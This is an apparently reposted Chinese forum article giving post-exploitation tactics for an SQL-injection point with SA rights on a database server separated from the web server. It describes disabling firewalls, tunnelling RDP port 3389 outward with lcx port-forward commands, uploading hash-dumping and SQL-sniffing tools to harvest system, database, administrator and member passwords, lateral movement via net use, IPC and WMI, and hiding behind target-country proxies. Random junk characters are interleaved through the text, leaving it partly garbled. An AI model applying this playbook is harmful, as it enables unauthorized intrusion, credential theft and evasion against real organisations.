当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。; n `& a8 e1 C; |
( q- c9 v. I& y! g8 {
: @$ f- B+ v: t' ?: `! ?7 |
+ ^( B2 ?/ S9 f+ iSA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)
1 S; l( P+ n \/ W* f4 i
|/ v8 i4 V' u! \3 `9 m
- t9 T% @+ k! `2 a( d2 G0 Z2 L( T/ c# N一、DB机有公网IP.+ f$ V0 ^) |# h+ ?* [. d
" F/ i0 i" C1 h) [1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.7 `& K0 q3 \; R6 X" @! C# E
7 v' s' r d# y; m7 ]) o5 V# A8 v4 m2 ?9 d6 I q& f
2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.
; f- B3 ?) O1 ]6 I. ^2 v
1 N X: V" c, k" i# x" j* X" W; h9 N, i& F' _! B1 T
3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com p& ]# N. e# Z6 O4 u- p1 F
7 c) l* h7 a+ E/ z. p* N- a
% N S0 z/ X, c7 \) ^8 z4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.* f; |# t( s: I
2 i% h) a7 j* I6 g7 e
- u$ t+ J% M& L2 t, I: A) i* S* Y6 X. d ~9 N% f0 j8 U" G
二、DB机只有内网IP4 J6 v2 ]; [2 N
( w/ E# a0 d- D/ a2 Q$ b! e G
1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.
- v0 f+ D/ F( |# w. f# T: {6 v! k/ O0 w S9 v; I2 V n
- o+ N; M* _$ [- L/ L2:停掉防火墙和IP策略再从内往外扫描.
2 b+ B# M9 z# p5 [7 e
* i7 p' B B+ h1 m8 Q" B8 l7 O. x; u6 n; ~9 \
3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的./ K% l$ Q+ e4 ]$ p
4 P8 C# q7 E0 J6 d/ V
' F( l+ J* J6 D
4:学会密码规律分析往往会有惊喜.
* e+ K: A" s% i0 P% Q6 Y2 B# ?1 P
4 ]) ?0 x3 R3 n( k5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等
0 X$ a& I8 q+ \* d# X+ _6 K J; K: l. Q2 j5 ^+ H
% v) C% L! l5 l! I$ T# c
有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的 |